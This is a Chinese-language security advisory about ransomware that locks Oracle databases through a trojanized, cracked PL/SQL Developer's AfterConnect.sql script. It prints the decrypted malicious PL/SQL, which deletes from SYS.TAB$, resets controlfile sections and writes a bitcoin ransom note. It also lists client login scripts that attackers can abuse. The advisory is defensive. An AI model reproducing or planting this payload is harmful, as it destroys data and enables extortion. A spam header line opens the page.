自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

【紅色警報】近期Oracle數(shù)據(jù)庫遭受比特幣勒索攻擊原因揭秘和預(yù)防(一)

數(shù)據(jù)庫 其他數(shù)據(jù)庫
最近,很多用戶遭遇到數(shù)據(jù)庫的安全問題,我們在此提示所有Oracle數(shù)據(jù)庫用戶關(guān)注此問題。

   最近,很多用戶遭遇到數(shù)據(jù)庫的安全問題,我們在此提示所有Oracle數(shù)據(jù)庫用戶關(guān)注此問題。

[[176378]]

  問題癥狀:

  登錄數(shù)據(jù)庫時,提示數(shù)據(jù)庫被鎖死,黑客提示發(fā)送5個比特幣可以解鎖。

  在數(shù)據(jù)庫的日志中,可能獲得的信息如下:

  ORA-00604: error occurred at recursive SQL level 1

  ORA-20315: 你的數(shù)據(jù)庫已被SQL RUSH Team鎖死 發(fā)送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (大小寫一致) 之后把你的Oracle SID郵寄地址 sqlrush@mail.com 我們將讓你知道如何解鎖你的數(shù)據(jù)庫

  Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.

  ORA-06512: at “XXX.DBMS_CORE_INTERNAL ", line 27

  ORA-06512: at line 2

  問題原因:

  根據(jù)我們收集的信息分析,這個問題的原因是:

  如果用戶從某些不明來源下載了PL/SQL Developer工具后(尤其是各種綠色版、破解版),這個工具的安裝目錄存在一個腳本文件AfterConnect.sql,正常安裝這個腳本是空文件,但是被注入的文件,該腳本包含了一系列的JOB定義、存儲過程和觸發(fā)器定義。

  受感染的AfterConnect.sql腳本開頭偽裝非常正常的代碼:

  實質(zhì)內(nèi)容卻是加密的惡意代碼:

  腳本代碼的核心部分解密后如下:

  BEGIN

  SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;

  IF (DATE1>=1200) THEN

  EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select * from sys.tab$';

  DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38)) ;

  COMMIT;

  EXECUTE IMMEDIATE 'alter system checkpoint';

  SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);

  FOR I IN 1..2046 LOOP

  DBMS_SYSTEM.KSDWRT(2, 'Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');

  DBMS_SYSTEM.KSDWRT(2, '你的數(shù)據(jù)庫已被SQL RUSH Team鎖死 發(fā)送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (大小寫一致) 之后把你的Oracle SID郵寄地址 sqlrush@mail.com 我們將讓你知道如何解鎖你的數(shù)據(jù)庫 ');

  END LOOP;

  END IF;

  END;

  一旦使用這個工具訪問數(shù)據(jù)庫,相應(yīng)對象會被后臺自動注入數(shù)據(jù)庫,執(zhí)行觸發(fā)器阻止后續(xù)的用戶登錄,并通過任務(wù)Truncate數(shù)據(jù)庫表。

  我們強烈建議用戶檢查數(shù)據(jù)庫工具的使用情況,避免使用來歷不明的工具產(chǎn)品。

  我們強烈建議:采用正版軟件,規(guī)避未知風(fēng)險。

  安全漏洞:

  幾乎絕大多數(shù)客戶端工具,在訪問數(shù)據(jù)庫時,都可以通過腳本進行一定的功能定義,而這些腳本往往就是安全問題的漏洞之一,來歷不明的工具是數(shù)據(jù)庫管理大忌,以下列出了常見客戶端工具的腳本位置,需要引起注意:

  SQL*Plus: glogin.sql / login.sql

  TOAD : toad.ini

  PLSQLdeveloper: login.sql / afterconnect.sql

  處置建議:

  如果您的數(shù)據(jù)庫已經(jīng)遭受攻擊和數(shù)據(jù)損失,可以緊急聯(lián)系云和恩墨的服務(wù)團隊,我們可以幫助您處理數(shù)據(jù)修復(fù)事宜。云和恩墨的ODU產(chǎn)品,可以在數(shù)據(jù)丟失后最大限度的恢復(fù)數(shù)據(jù)。

  事件回顧:

  2015年9月,XcodeGhost入侵蘋果iOS事件在業(yè)內(nèi)引起不小震動。事件起因為不知名黑客向iOS應(yīng)用開發(fā)工具Xcode植入惡意程序,通過網(wǎng)盤和論壇上傳播,被感染的App并以此劫持蘋果用戶相關(guān)信息。來自多個安全團隊數(shù)據(jù)顯示,病毒感染波及AppStore下載量最高的5000個App其中的76個,保守估計受影響用戶數(shù)超過一億。

  2012年2月,中文版putty等SSH遠(yuǎn)程管理工具被曝出存在后門,該后門會自動竊取管理員所輸入的SSH用戶名與口令,并將其發(fā)送至指定服務(wù)器上。

責(zé)任編輯:關(guān)崇
相關(guān)推薦

2020-12-15 20:00:09

比特幣加密貨幣區(qū)塊鏈

2017-06-08 12:26:23

2009-03-13 10:29:51

技術(shù)人員職業(yè)生涯健康

2013-06-08 17:32:35

DedeCMS零日威脅DedeCMS

2022-02-16 14:38:52

勒索軟件攻擊

2021-01-26 00:50:45

DDoS勒索攻擊網(wǎng)絡(luò)安全

2014-04-18 15:31:42

2021-06-03 23:02:39

比特幣虛擬貨幣貨幣

2021-07-13 22:39:46

比特幣加密貨幣勒索軟件

2022-01-13 12:45:00

比特幣勒索病毒攻擊

2023-09-14 14:46:05

2024-03-07 16:35:29

2021-07-14 10:14:06

勒索軟件攻擊數(shù)據(jù)泄露

2019-08-16 17:09:34

2013-01-10 18:00:09

2013-11-11 09:32:42

2013-11-10 17:03:56

2021-04-27 10:17:07

勒索軟件攻擊漏洞

2020-10-06 10:35:52

DDoS勒索攻擊攻擊威脅

2014-08-25 10:14:08

點贊
收藏

51CTO技術(shù)棧公眾號